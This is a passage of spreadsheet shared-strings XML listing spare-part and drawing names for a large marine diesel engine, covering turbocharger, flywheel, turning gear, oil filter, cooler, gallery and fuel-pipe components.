    <t>HEAD-TIGHTENING BOLT</t>
  </si>
  <si>
    <t>CHAIN WH.F.COUNTERWEIGHTS</t>
  </si>
  <si>
    <t>SPRING, TORSION</t>
  </si>
  <si>
    <t>CHAIN WHEEL, CRANKSHAFT</t>
  </si>
  <si>
    <t>PIN GAUGE-FLEX. COUPLING</t>
  </si>
  <si>
    <t>RETAIN. TOOL-CHAIN TIGHT.</t>
  </si>
  <si>
    <t>LIFT.TOOL, MOMENT COPM.WH</t>
  </si>
  <si>
    <t>GAUGE,</t>
  </si>
  <si>
    <t>STEEL PIPE</t>
  </si>
  <si>
    <t>SAMPLING KIT</t>
  </si>
  <si>
    <t>DAMPER CHARACTERISTIC</t>
  </si>
  <si>
    <t>VIBRATION DAMPER W. ATT.</t>
  </si>
  <si>
    <t>COOLER FLANGE</t>
  </si>
  <si>
    <t>SCAVENGE AIR BYPASS</t>
  </si>
  <si>
    <t>LIFTING ATTACHMENT</t>
  </si>
  <si>
    <t>FLOOR PL.SCAV.AIR RECEIVE</t>
  </si>
  <si>
    <t>PIPE FOR OUTLET</t>
  </si>
  <si>
    <t>SHELL, SCAV.AIR RECEIVER</t>
  </si>
  <si>
    <t>VALVE MOUNTING PLATE</t>
  </si>
  <si>
    <t>MOUNTING FIXTURE</t>
  </si>
  <si>
    <t>INSULATION COVER</t>
  </si>
  <si>
    <t>INSULATION COVER-REMOVABL</t>
  </si>
  <si>
    <t>NOISE ABSORPTION CASSETTE</t>
  </si>
  <si>
    <t>CHARGING AIR PIPE</t>
  </si>
  <si>
    <t>PLATES-CHARGING AIR PIPE</t>
  </si>
  <si>
    <t>MEASURING ORIFICE</t>
  </si>
  <si>
    <t>DAMPER HOUSING</t>
  </si>
  <si>
    <t>SHELL FOR CONNECTING PIPE</t>
  </si>
  <si>
    <t>PIPE BRANCH</t>
  </si>
  <si>
    <t>RUBBER SOCKET</t>
  </si>
  <si>
    <t>DETAIL F.TRANSITION PIPE</t>
  </si>
  <si>
    <t>PLATE-GALVANIZED</t>
  </si>
  <si>
    <t>STEEL PLATE</t>
  </si>
  <si>
    <t>SAFETY STRAP</t>
  </si>
  <si>
    <t>PUMP VALVE</t>
  </si>
  <si>
    <t>ORIFICE FOR SCAV.AIR REC.</t>
  </si>
  <si>
    <t>PLATE FOR COOLERBOX</t>
  </si>
  <si>
    <t>INLET CONNECTING</t>
  </si>
  <si>
    <t>CONDENSATE DISCHARGE</t>
  </si>
  <si>
    <t>PIPE SECTION</t>
  </si>
  <si>
    <t>INLET BEND</t>
  </si>
  <si>
    <t>REMACHINING INL. CONNECT.</t>
  </si>
  <si>
    <t>ARR.COMB.AIR BYPASS VALVE</t>
  </si>
  <si>
    <t>TRANSITION PIECE</t>
  </si>
  <si>
    <t>ARR. OF SAFETY HEAD</t>
  </si>
  <si>
    <t>SHIELDING FOR AIR INLET</t>
  </si>
  <si>
    <t>LOW LOAD BLOWER SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF CHARGING AIR PIPE</t>
  </si>
  <si>
    <t>ARR. OF BLOW-OFF VALVE</t>
  </si>
  <si>
    <t>BLOW-OFF VALVE</t>
  </si>
  <si>
    <t>PIPE-EXH.VALVE-CLAMPED</t>
  </si>
  <si>
    <t>HOLDER FOR GRID-CLAMPED</t>
  </si>
  <si>
    <t>SUPPORT FOR GRATE-WELDED</t>
  </si>
  <si>
    <t>NECK FLANGE-EXHAUST VALVE</t>
  </si>
  <si>
    <t>JUNK RING</t>
  </si>
  <si>
    <t>RING FOR GRID</t>
  </si>
  <si>
    <t>BAR FOR GRID</t>
  </si>
  <si>
    <t>BLIND PLATE-AFTER T.C.</t>
  </si>
  <si>
    <t>SHELL F EXHAUST RECEIVER</t>
  </si>
  <si>
    <t>DIVISION PLATE</t>
  </si>
  <si>
    <t>MOUNTING RING</t>
  </si>
  <si>
    <t>SPACER</t>
  </si>
  <si>
    <t>GALVANIZED BANDIRON FRAME</t>
  </si>
  <si>
    <t>ORIFICE FOR EXH.RECEIVER</t>
  </si>
  <si>
    <t>FORK</t>
  </si>
  <si>
    <t>SHELL, EXHAUST RECEIVER</t>
  </si>
  <si>
    <t>STRENGTHENING RING, EXH.R</t>
  </si>
  <si>
    <t>STIFFENING RING</t>
  </si>
  <si>
    <t>TURBOCHARGING ARRANGEMENT</t>
  </si>
  <si>
    <t>EXHAUST PIPE BEND</t>
  </si>
  <si>
    <t>EXHAUST PIPE F.CYL.7+8+9</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL.1</t>
  </si>
  <si>
    <t>ROUND STEEL BAR</t>
  </si>
  <si>
    <t>PLATE (SHAPED)</t>
  </si>
  <si>
    <t>PIPE STUB FOR CLAMP</t>
  </si>
  <si>
    <t>GUIDE FLANGE</t>
  </si>
  <si>
    <t>STEEL BAND</t>
  </si>
  <si>
    <t>STIFFENER</t>
  </si>
  <si>
    <t>STUBS FOR THERMOMETERS</t>
  </si>
  <si>
    <t>PIPE BEND</t>
  </si>
  <si>
    <t>CATCH COMPLETE</t>
  </si>
  <si>
    <t>EXHAUST PIPE INLET-T.C.</t>
  </si>
  <si>
    <t>SUPPORT FOR EXH.RECEIVER</t>
  </si>
  <si>
    <t>ARR.OF HEATING SHIELD</t>
  </si>
  <si>
    <t>PIPE-TURBOCHARGER</t>
  </si>
  <si>
    <t>INSULATION MATERIAL</t>
  </si>
  <si>
    <t>SUPPORT FOR STAYBOLT</t>
  </si>
  <si>
    <t>PIPE-EXHAUST VALVE</t>
  </si>
  <si>
    <t>INSULATION RETAIN. PLATE</t>
  </si>
  <si>
    <t>ASSEMBLY SCREW/NUT</t>
  </si>
  <si>
    <t>INSULATION PLATE SUPPORT</t>
  </si>
  <si>
    <t>INTERMEDIATE SUPPORT</t>
  </si>
  <si>
    <t>SPECIFICATION OF TC</t>
  </si>
  <si>
    <t>INSULATION PLATE COVER</t>
  </si>
  <si>
    <t>SUPPORT-MAINPIPE/RECEIVER</t>
  </si>
  <si>
    <t>SAFETY HEAD</t>
  </si>
  <si>
    <t>RUPTURE DISK</t>
  </si>
  <si>
    <t>RESTRICTION</t>
  </si>
  <si>
    <t>CONTAINER</t>
  </si>
  <si>
    <t>NAMEPLATE FOR DRYCLEANING</t>
  </si>
  <si>
    <t>NAMEPLATE FOR WATERWASH</t>
  </si>
  <si>
    <t>EXHAUST PIPE FOR CYL. 2</t>
  </si>
  <si>
    <t>NAMEPLATE F.COMPRES.WASH</t>
  </si>
  <si>
    <t>COMBUSTION SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF AUX. AIR PIPE</t>
  </si>
  <si>
    <t>SPARK ARRESTOR</t>
  </si>
  <si>
    <t>AIR FILTER FELT</t>
  </si>
  <si>
    <t>COMPENSATOR DUMMY</t>
  </si>
  <si>
    <t>COMPENSATOR EXTENDER</t>
  </si>
  <si>
    <t>DRAIN/CLEANING OF TC</t>
  </si>
  <si>
    <t>FOOT F. TURBUCHARGER</t>
  </si>
  <si>
    <t>COVERING OF EXHAUST PIPE</t>
  </si>
  <si>
    <t>VIBR. &amp; CHOCK ISOLATION</t>
  </si>
  <si>
    <t>END COVER FORE</t>
  </si>
  <si>
    <t>REMACH. CONNECTING PIECE</t>
  </si>
  <si>
    <t>DRAIN F. TURBOCHARGER</t>
  </si>
  <si>
    <t>3-WAY COCK</t>
  </si>
  <si>
    <t>WATER WASH OF COMPRESSOR</t>
  </si>
  <si>
    <t>BUT STRAP</t>
  </si>
  <si>
    <t>WATER WASH OF TURBINESIDE</t>
  </si>
  <si>
    <t>VALVE FOR WATER WASH</t>
  </si>
  <si>
    <t>SUSPENSION</t>
  </si>
  <si>
    <t>MANOEUVRING VALVE</t>
  </si>
  <si>
    <t>WATER TANK</t>
  </si>
  <si>
    <t>PLATE SCREW</t>
  </si>
  <si>
    <t>EXHAUST SILENCER</t>
  </si>
  <si>
    <t>COMBUST. AIR DIAGRAM</t>
  </si>
  <si>
    <t>EXHAUST PIPE - AFTER</t>
  </si>
  <si>
    <t>EXHAUST PIPES AFTER TC</t>
  </si>
  <si>
    <t>SNAP COUPLING</t>
  </si>
  <si>
    <t>TURNING WHEEL</t>
  </si>
  <si>
    <t>GENERATOR SHAFT</t>
  </si>
  <si>
    <t>PTO SHAFT</t>
  </si>
  <si>
    <t>UPPER FLANGE FOR SHIELD</t>
  </si>
  <si>
    <t>SHIELD-UPPER</t>
  </si>
  <si>
    <t>SHIELD-LOWER</t>
  </si>
  <si>
    <t>SHIELD-FORE</t>
  </si>
  <si>
    <t>LOWER FLANGE FOR SHIELD</t>
  </si>
  <si>
    <t>OIL FEED UNIT -UPPER PART</t>
  </si>
  <si>
    <t>OIL FEED UNIT -LOWER PART</t>
  </si>
  <si>
    <t>OIL FEED UNIT-SUPPORT</t>
  </si>
  <si>
    <t>FLEXIBLE COUPLING</t>
  </si>
  <si>
    <t>COUPLING GUARD</t>
  </si>
  <si>
    <t>HOLSET COUPLING</t>
  </si>
  <si>
    <t>HUB FOR FLYWHEEL</t>
  </si>
  <si>
    <t>RIM FOR FLYWHEEL</t>
  </si>
  <si>
    <t>REPAIR SOLUTION, FLYWHEEL</t>
  </si>
  <si>
    <t>GUARD FOR FLYWHEEL COMPL.</t>
  </si>
  <si>
    <t>GUARD FOR FLYWHEEL</t>
  </si>
  <si>
    <t>CAM FOR FLYWHEEL GUARD</t>
  </si>
  <si>
    <t>SUPPLEMENT FOR FLYWHEEL</t>
  </si>
  <si>
    <t>FLYWHEEL COMPLETE</t>
  </si>
  <si>
    <t>FLYWHEEL POINTER</t>
  </si>
  <si>
    <t>FLANGE SHAFT</t>
  </si>
  <si>
    <t>FLANGE BLANK</t>
  </si>
  <si>
    <t>TUBE FOR SHAFT</t>
  </si>
  <si>
    <t>KEEP PLATE</t>
  </si>
  <si>
    <t>DETAIL FOR BRACKET</t>
  </si>
  <si>
    <t>INNER MEMBER</t>
  </si>
  <si>
    <t>THRUST BEARING DIVIDED</t>
  </si>
  <si>
    <t>TEETHBAND-COMPLETE</t>
  </si>
  <si>
    <t>1/2 TEETHBAND</t>
  </si>
  <si>
    <t>SUPPL. F.GUARD F.FLYWHEEL</t>
  </si>
  <si>
    <t>TOOTH PROFILE</t>
  </si>
  <si>
    <t>SKETCH F.MARKING FLYWHEEL</t>
  </si>
  <si>
    <t>FLYWHEEL (BLANK)</t>
  </si>
  <si>
    <t>GEAR RIM, DIVIDED</t>
  </si>
  <si>
    <t>PLANET GEAR</t>
  </si>
  <si>
    <t>OUTPUT SHAFT</t>
  </si>
  <si>
    <t>DISENGAGING SPINDLE</t>
  </si>
  <si>
    <t>STOP</t>
  </si>
  <si>
    <t>FLANGED AXLE</t>
  </si>
  <si>
    <t>SHAFT WITH TOOTHING</t>
  </si>
  <si>
    <t>WORM SHAFT</t>
  </si>
  <si>
    <t>WORM WHEEL-BLANK</t>
  </si>
  <si>
    <t>BEARING GUIDE</t>
  </si>
  <si>
    <t>SLIDE BAR</t>
  </si>
  <si>
    <t>BRACKET-TURNING GEAR</t>
  </si>
  <si>
    <t>LIFTING CAM</t>
  </si>
  <si>
    <t>DEAD CENTRE POINTER</t>
  </si>
  <si>
    <t>DISENGAGING FORK-BRACKET</t>
  </si>
  <si>
    <t>DISENGAGER</t>
  </si>
  <si>
    <t>TURNINGMOTOR</t>
  </si>
  <si>
    <t>PLATE FOR TURNINGBRACKET</t>
  </si>
  <si>
    <t>MICROSWITCH</t>
  </si>
  <si>
    <t>WALL SOCKET</t>
  </si>
  <si>
    <t>ARR.TURNING SAFETY DEVICE</t>
  </si>
  <si>
    <t>PLATE FOR COMPONENTS</t>
  </si>
  <si>
    <t>TURNING ROD</t>
  </si>
  <si>
    <t>WORM GEAR</t>
  </si>
  <si>
    <t>EL-MOTOR</t>
  </si>
  <si>
    <t>TURNING GEAR, COMPLETE</t>
  </si>
  <si>
    <t>ARR. OF START./TURN. GEAR</t>
  </si>
  <si>
    <t>AIR STARTER W/PRESS.RED.V</t>
  </si>
  <si>
    <t>DIRT SEPERATOR</t>
  </si>
  <si>
    <t>LUBRICATOR</t>
  </si>
  <si>
    <t>AIR STARTER W. ATT.</t>
  </si>
  <si>
    <t>MUFFLER</t>
  </si>
  <si>
    <t>IN-LINE LUBRICATOR</t>
  </si>
  <si>
    <t>PRESSURE REDUCTION VALVE</t>
  </si>
  <si>
    <t>ANGEL PROFILE</t>
  </si>
  <si>
    <t>SPARE PART KIT</t>
  </si>
  <si>
    <t>AIR STARTER MOTOR</t>
  </si>
  <si>
    <t>STOP SWITCH</t>
  </si>
  <si>
    <t>REMOTE CONTROL SWITCH</t>
  </si>
  <si>
    <t>BRACKET FOR TURNING ROD</t>
  </si>
  <si>
    <t>ON-OFF VALVE</t>
  </si>
  <si>
    <t>GEAR MOTOR</t>
  </si>
  <si>
    <t>DEAD CENTER POINTER</t>
  </si>
  <si>
    <t>HFO FILTER</t>
  </si>
  <si>
    <t>MDO FILTER</t>
  </si>
  <si>
    <t>FUEL OIL FILTER ELEMENT</t>
  </si>
  <si>
    <t>COVER F. FUEL OIL FILTER</t>
  </si>
  <si>
    <t>FILTER ELEMENT</t>
  </si>
  <si>
    <t>FILTER HOUSING</t>
  </si>
  <si>
    <t>PIPE-VENTING INSIDE</t>
  </si>
  <si>
    <t>GEAR RIM, LUB.OIL FILTER</t>
  </si>
  <si>
    <t>GEARWHEEL, LUB.OIL FILTER</t>
  </si>
  <si>
    <t>SPINDLE, LUB.OIL FILTER</t>
  </si>
  <si>
    <t>HUB-CHAIN WHEEL</t>
  </si>
  <si>
    <t>CHAIN GUARD</t>
  </si>
  <si>
    <t>FILTER PLATE INSIDE</t>
  </si>
  <si>
    <t>PACKING FOR AIR CHAMBER</t>
  </si>
  <si>
    <t>HANDLE FOR COVER</t>
  </si>
  <si>
    <t>PIPE HOLDER,LUB.OILFILTER</t>
  </si>
  <si>
    <t>TOP RING</t>
  </si>
  <si>
    <t>BOTTOM RING</t>
  </si>
  <si>
    <t>STIFFENER PLATE</t>
  </si>
  <si>
    <t>RING FOR MANHOLE</t>
  </si>
  <si>
    <t>PACKING FOR COVER</t>
  </si>
  <si>
    <t>LUB.OIL FILTER</t>
  </si>
  <si>
    <t>SEALING LUB. OIL FILTER</t>
  </si>
  <si>
    <t>UNEQUAL ANGLE IRON 1</t>
  </si>
  <si>
    <t>FLAT STEEL</t>
  </si>
  <si>
    <t>UNEQUAL ANGLE IRON 2</t>
  </si>
  <si>
    <t>CENTRIFUGAL OIL FILTER</t>
  </si>
  <si>
    <t>CARTRIDGE</t>
  </si>
  <si>
    <t>FILLER SCREEN</t>
  </si>
  <si>
    <t>LUB. OIL REGULATING VALVE</t>
  </si>
  <si>
    <t>SHIM FOR LUB. OIL FILTER</t>
  </si>
  <si>
    <t>SUCTION FILTER</t>
  </si>
  <si>
    <t>LUB.OIL COOLER, MOUNTING</t>
  </si>
  <si>
    <t>GUIDE WITH LOCK RINGS</t>
  </si>
  <si>
    <t>GUIDE FOR GUIDE PLATES</t>
  </si>
  <si>
    <t>PIPE PLATE</t>
  </si>
  <si>
    <t>GUIDEPLATE</t>
  </si>
  <si>
    <t>COOLER JACKET</t>
  </si>
  <si>
    <t>COOLING PIPE</t>
  </si>
  <si>
    <t>PLATE COOLER LUB. OIL</t>
  </si>
  <si>
    <t>FRAME PLATE FOR COOLER</t>
  </si>
  <si>
    <t>PLATE COOLER FRESH WATER</t>
  </si>
  <si>
    <t>GUARD FOR COOLER</t>
  </si>
  <si>
    <t>COOLER ELEMENT</t>
  </si>
  <si>
    <t>RUBBER LINING</t>
  </si>
  <si>
    <t>COMB.LUB.OIL &amp; F.W.COOLER</t>
  </si>
  <si>
    <t>NOZZLE OIL COOLER, PLATES</t>
  </si>
  <si>
    <t>ADJUSTMENT OF LUBRICATORS</t>
  </si>
  <si>
    <t>CRANK PIN</t>
  </si>
  <si>
    <t>LOAD CHANGE DEVICE/MOUNT.</t>
  </si>
  <si>
    <t>SOLENOID VALVE/MOUNTING</t>
  </si>
  <si>
    <t>HOUSING FOR LUBRICATOR DR</t>
  </si>
  <si>
    <t>DOSAGE SCREW</t>
  </si>
  <si>
    <t>DISTRIBUTOR BLOCK, LUBRI.</t>
  </si>
  <si>
    <t>SHAFT-LUBRICATOR</t>
  </si>
  <si>
    <t>THREADED UNION</t>
  </si>
  <si>
    <t>KNUCKLE ARM</t>
  </si>
  <si>
    <t>REGULATING LEVER</t>
  </si>
  <si>
    <t>KEY GUIDE PIECE</t>
  </si>
  <si>
    <t>MASTER CONTROL UNIT</t>
  </si>
  <si>
    <t>BACKUP CONTROL UNIT</t>
  </si>
  <si>
    <t>CIRCUIT BOARD - MCU</t>
  </si>
  <si>
    <t>CIRCUIT BOARD - BCU</t>
  </si>
  <si>
    <t>CIRCUIT BOARD - SBU</t>
  </si>
  <si>
    <t>FLANGE FOR GEAR</t>
  </si>
  <si>
    <t>SERVO VALVE HOUSING</t>
  </si>
  <si>
    <t>SERVO VALVE</t>
  </si>
  <si>
    <t>WORM WHEEL</t>
  </si>
  <si>
    <t>PRESSURE GAUGE HOSE</t>
  </si>
  <si>
    <t>PORTABLE PRESSURE GAUGE</t>
  </si>
  <si>
    <t>PLATE TURKISH TEXT</t>
  </si>
  <si>
    <t>PLATE ICELANDIC TEXT</t>
  </si>
  <si>
    <t>COUPLING FOR MANOMETER</t>
  </si>
  <si>
    <t>INSTRUMENTATION</t>
  </si>
  <si>
    <t>VALVE ARR. F. DIFF. PRESS</t>
  </si>
  <si>
    <t>CONN F. REMOTE INDICATION</t>
  </si>
  <si>
    <t>SUPPORT BUSHING (SERTO)</t>
  </si>
  <si>
    <t>PRESSURE GAUGE PIPE</t>
  </si>
  <si>
    <t>PRESS. GAUGE SYSTEM</t>
  </si>
  <si>
    <t>LIST OF PRESSURE GAUGE</t>
  </si>
  <si>
    <t>INSTR. PLATE DANISH TEXT</t>
  </si>
  <si>
    <t>INSTRUCT. PLATE, ENGLISH</t>
  </si>
  <si>
    <t>INSTR. PLATE  FRENCH TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE SPANISH TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE PORTU. TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE RUSSIAN TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE POLISH TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE ITALIAN TEXT</t>
  </si>
  <si>
    <t>INSTR. PLATE GERMAN TEXT</t>
  </si>
  <si>
    <t>TACHOMETER</t>
  </si>
  <si>
    <t>BLANK F.INSTRUCTION PLATE</t>
  </si>
  <si>
    <t>DIFFERENCE PRESSURE GUAGE</t>
  </si>
  <si>
    <t>SHIELD F.PRESS.GAUGE PANE</t>
  </si>
  <si>
    <t>RUBBER CLUTCH</t>
  </si>
  <si>
    <t>PRESSURE GAUGE FOR P 140</t>
  </si>
  <si>
    <t>BRACK. F.INSTRUMENT PANEL</t>
  </si>
  <si>
    <t>REAR PLATE</t>
  </si>
  <si>
    <t>DIVIDING PLATE</t>
  </si>
  <si>
    <t>NAMEPLATE FOR WATER WASH</t>
  </si>
  <si>
    <t>PRESSURE GAUGE PANEL</t>
  </si>
  <si>
    <t>MANOMETER</t>
  </si>
  <si>
    <t>PLATE F. INSTRUMENTPANEL</t>
  </si>
  <si>
    <t>LIST OF THERMOMETERS</t>
  </si>
  <si>
    <t>PLATES FOR FLANGES</t>
  </si>
  <si>
    <t>BAND STEEL</t>
  </si>
  <si>
    <t>SWITCH KNOB</t>
  </si>
  <si>
    <t>ALARM SWITCH</t>
  </si>
  <si>
    <t>SUSPENSION IRON</t>
  </si>
  <si>
    <t>INSTR.PLATE F.OIL FILTER</t>
  </si>
  <si>
    <t>END COVER-LUB.OIL PUMP</t>
  </si>
  <si>
    <t>HOUSING FOR LUBE OIL PUMP</t>
  </si>
  <si>
    <t>SELF LOCKING NUT</t>
  </si>
  <si>
    <t>CON. GEARWHEEL</t>
  </si>
  <si>
    <t>POWER TAKE OF</t>
  </si>
  <si>
    <t>COUNTER NUT</t>
  </si>
  <si>
    <t>SHAFT FOR POWER TAKE OFF</t>
  </si>
  <si>
    <t>LUBRICATING OIL PUMP</t>
  </si>
  <si>
    <t>GUIDE FOR ADJUSTING SCREW</t>
  </si>
  <si>
    <t>ADAPTOR</t>
  </si>
  <si>
    <t>HOUSING F. PRESS.GOVERNOR</t>
  </si>
  <si>
    <t>FRONT END BOX, COMPL.</t>
  </si>
  <si>
    <t>FRONT END BOX</t>
  </si>
  <si>
    <t>MOUNT. OF FLANGE</t>
  </si>
  <si>
    <t>M. OF OIL THERM. IN FEB</t>
  </si>
  <si>
    <t>REWORK FRONT END BOX</t>
  </si>
  <si>
    <t>SUPPL. DRAW. FOR F.E.B</t>
  </si>
  <si>
    <t>ASSM. COVER</t>
  </si>
  <si>
    <t>PUMP HOUSING</t>
  </si>
  <si>
    <t>IMPELLER</t>
  </si>
  <si>
    <t>TRACE BALL BEARING</t>
  </si>
  <si>
    <t>OIL SEALING RING</t>
  </si>
  <si>
    <t>SEAWATER COOL. PUMP COMP.</t>
  </si>
  <si>
    <t>ANGLE CONTACT</t>
  </si>
  <si>
    <t>COOLING WATER DIAGRAM</t>
  </si>
  <si>
    <t>PUMP CHARACTERISTIC</t>
  </si>
  <si>
    <t>FUEL GAS INLET PIPE</t>
  </si>
  <si>
    <t>FUEL GAS INLET BLOCK</t>
  </si>
  <si>
    <t>RETAINING SCREW-N/R VALVE</t>
  </si>
  <si>
    <t>MOUNT. OF COUPLING FLANGE</t>
  </si>
  <si>
    <t>MOUNT. OF FLYWEIGHT</t>
  </si>
  <si>
    <t>GAS INLET-BOLTED CONN.</t>
  </si>
  <si>
    <t>GAS BRANCH PIPE</t>
  </si>
  <si>
    <t>CUT-OUT VALVE T/C</t>
  </si>
  <si>
    <t>ENDCOVER F.TUBE W.NOZZLES</t>
  </si>
  <si>
    <t>PIPES F.CHEM.CLEAN.A.C.</t>
  </si>
  <si>
    <t>GUIDE F.NOZZLE TUBE BUSH</t>
  </si>
  <si>
    <t>THROTTLE PLATE</t>
  </si>
  <si>
    <t>BLANK PLATE</t>
  </si>
  <si>
    <t>RAIL FOR AIR COOLER</t>
  </si>
  <si>
    <t>SUPPORT FOR WHEEL</t>
  </si>
  <si>
    <t>PULLING TOOL</t>
  </si>
  <si>
    <t>COOLER CLEANING CURTAIN</t>
  </si>
  <si>
    <t>CLEANING GUN FOR COOLER</t>
  </si>
  <si>
    <t>TURBOCH. CLEANING SYSTEM</t>
  </si>
  <si>
    <t>TOOLS FOR COOLER CLEANING</t>
  </si>
  <si>
    <t>TOOLS FOR COOLER</t>
  </si>
  <si>
    <t>GALL.BRACKET-UPPER-EXH.</t>
  </si>
  <si>
    <t>GALL.BRACK.UPPER-MAN.SIDE</t>
  </si>
  <si>
    <t>GALL.BRACKET-CENTRE-EXH.</t>
  </si>
  <si>
    <t>COOLER BRACKET</t>
  </si>
  <si>
    <t>GALL.BRACKET LOWER MAN.</t>
  </si>
  <si>
    <t>GALL.BRACKET-LOWER-MAN.</t>
  </si>
  <si>
    <t>GALL.BRACKET-LOWER-EXH.</t>
  </si>
  <si>
    <t>GALL.BRACKET-END</t>
  </si>
  <si>
    <t>GALL.BRACKET, FORE END</t>
  </si>
  <si>
    <t>GALL.BRACKET-SPECIAL</t>
  </si>
  <si>
    <t>FACE,WELD-ON GALL.BRACKET</t>
  </si>
  <si>
    <t>CRANE BEAM</t>
  </si>
  <si>
    <t>MOUNTING FOR CRANE BEAM</t>
  </si>
  <si>
    <t>STANCHION</t>
  </si>
  <si>
    <t>PLATFORM-UPPER-MAN.SIDE</t>
  </si>
  <si>
    <t>PLATFORM-CENTRE-MAN.SIDE</t>
  </si>
  <si>
    <t>PLATFORM-CENTRE-EXH. SIDE</t>
  </si>
  <si>
    <t>PLATFORM-LOWER-MAN.SIDE</t>
  </si>
  <si>
    <t>PLATFORM-LOWER-EXH. SIDE</t>
  </si>
  <si>
    <t>PLATFORM INSIDE CRANKCASE</t>
  </si>
  <si>
    <t>PLATFORM WITH LADDER</t>
  </si>
  <si>
    <t>FLOOR AND COVER PLATE</t>
  </si>
  <si>
    <t>FLOOR PLATES</t>
  </si>
  <si>
    <t>EXH.VALVE-SUPPORT ARR.</t>
  </si>
  <si>
    <t>PROTECTIVE COLLAR</t>
  </si>
  <si>
    <t>RING FOR COPPER COLLAR</t>
  </si>
  <si>
    <t>RING FOR PISTON SUPPORT</t>
  </si>
  <si>
    <t>RING FOR COVER ON PLATF.</t>
  </si>
  <si>
    <t>RING FOR EXH.VALVE SUPP.</t>
  </si>
  <si>
    <t>FLOOR GRATING</t>
  </si>
  <si>
    <t>BEAM</t>
  </si>
  <si>
    <t>BEAM FOR STOP PISTON VAL.</t>
  </si>
  <si>
    <t>MOUNTINGS-SPECIAL</t>
  </si>
  <si>
    <t>BEAM FOR PRESSURE RISER</t>
  </si>
  <si>
    <t>GUARD FOR COUPLING</t>
  </si>
  <si>
    <t>GUARD FOR INDICATOR CAM</t>
  </si>
  <si>
    <t>GUARDS(KICK PL REG.SHAFT)</t>
  </si>
  <si>
    <t>STRINGER</t>
  </si>
  <si>
    <t>BUTT-STRAP,STRAIGHT</t>
  </si>
  <si>
    <t>BUTT-STRAP,ANGLE</t>
  </si>
  <si>
    <t>BUTT-STRAP</t>
  </si>
  <si>
    <t>GALL.BRACK.ARR-UPP.MAN.</t>
  </si>
  <si>
    <t>GALLERY OUTLINE</t>
  </si>
  <si>
    <t>GALLERY BRACKET</t>
  </si>
  <si>
    <t>FRAME F.GALL.GRATE W.RAIL</t>
  </si>
  <si>
    <t>LADDER</t>
  </si>
  <si>
    <t>GALLERY GRATE W. RAILING</t>
  </si>
  <si>
    <t>GALLERY GRATE W. FRAME</t>
  </si>
  <si>
    <t>OVAL FLANGE</t>
  </si>
  <si>
    <t>WELD-ON FLANGE</t>
  </si>
  <si>
    <t>BLANK MATR. FOR CAMSHAFT</t>
  </si>
  <si>
    <t>SLIDING FLANGE</t>
  </si>
  <si>
    <t>SQUARE PACKING</t>
  </si>
  <si>
    <t>OVAL PACKING</t>
  </si>
  <si>
    <t>WELDING NECK FLANGE</t>
  </si>
  <si>
    <t>CONNECTION</t>
  </si>
  <si>
    <t>STRAIGHT MALE STUD COUPL.</t>
  </si>
  <si>
    <t>WELDING NIPPLE</t>
  </si>
  <si>
    <t>TEE FITTING</t>
  </si>
  <si>
    <t>REDUCING ADAPTOR</t>
  </si>
  <si>
    <t>EXPANDER PLUG</t>
  </si>
  <si>
    <t>PROTECTING LIST</t>
  </si>
  <si>
    <t>DIAPHRAGM</t>
  </si>
  <si>
    <t>THRUST SHAFT-LONG</t>
  </si>
  <si>
    <t>STOPPER-SEGMENT HOLDER</t>
  </si>
  <si>
    <t>SEGMENT HOLDER</t>
  </si>
  <si>
    <t>SCRAPER RING HOUSING UPP.</t>
  </si>
  <si>
    <t>SPRAY PIPE</t>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE</t>
  </si>
  <si>
    <t>STOPPER SEGMENT</t>
  </si>
  <si>
    <t>STUD, SEGMENT STOPPER</t>
  </si>
  <si>
    <t>THRUST RING COMPLETE</t>
  </si>
  <si>
    <t>THRUST RING, UPPER PART</t>
  </si>
  <si>
    <t>THRUST RING, LOWER PART</t>
  </si>
  <si>
    <t>PULLING STUD</t>
  </si>
  <si>
    <t>HAND NUT</t>
  </si>
  <si>
    <t>CONE BOLT</t>
  </si>
  <si>
    <t>OIL THROW RING-UPPER</t>
  </si>
  <si>
    <t>OIL THROW RING-LOWER</t>
  </si>
  <si>
    <t>WASTE TRAY</t>
  </si>
  <si>
    <t>HOLDER FOR WASTE TRAY</t>
  </si>
  <si>
    <t>TOOL F.TURN.OUT SEGMENTS</t>
  </si>
  <si>
    <t>CROSSBAR,LIFT.SEGM. STOPS</t>
  </si>
  <si>
    <t>BRIDGE GAUGE</t>
  </si>
  <si>
    <t>STUD,LIFT OF THRUST SHAFT</t>
  </si>
  <si>
    <t>DISMANTLING SCREW</t>
  </si>
  <si>
    <t>GAUGE PIN</t>
  </si>
  <si>
    <t>TIGHT.GAUGE SEGM.STOPPER</t>
  </si>
  <si>
    <t>CARRYING IRON</t>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL</t>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL,MOVABLE</t>
  </si>
  <si>
    <t>ARR. OF FUEL OIL HP PIPE</t>
  </si>
  <si>
    <t>DRAIN PIPE-FUEL PUMP</t>
  </si>
  <si>
    <t>FUEL OIL HP PIPE</t>
  </si>
  <si>
    <t>INSULATING TUBE</t>
  </si>
  <si>
    <t>PIPE HANGER</t>
  </si>
  <si>
    <t>PROTECTIVE PIPE</t>
  </si>
  <si>
    <t>FUEL OIL PIPE - OUTLET</t>
  </si>
  <si>
    <t>DRAIN PIPE FUEL OIL</t>
  </si>
  <si>
    <t>SUPPORT-DRAIN FUEL OIL</t>
  </si>
  <si>
    <t>VALVE COVER</t>
  </si>
  <si>
    <t>ADJUSTING NUT</t>
  </si>
  <si>
    <t>OIL DISCHARGER</t>
  </si>
  <si>
    <t>COOLING OIL OUTLET PIPE</t>
  </si>
  <si>
    <t>BRANCH PIPE CYL. SECTION</t>
  </si>
  <si>
    <t>FUEL OIL LEAKAGE ALARM</t>
  </si>
  <si>
    <t>OUTL.DRAINBOX INL.WASTET</t>
  </si>
  <si>
    <t>DRAIN PIPE TO WASTE TRAY</t>
  </si>
  <si>
    <t>FUEL OIL INLET</t>
  </si>
  <si>
    <t>FUEL OIL OUTLET</t>
  </si>
  <si>
    <t>DRAIN PIPE FROM CYL. HEAD</t>
  </si>
  <si>
    <t>FUEL OIL PIPES</t>
  </si>
  <si>
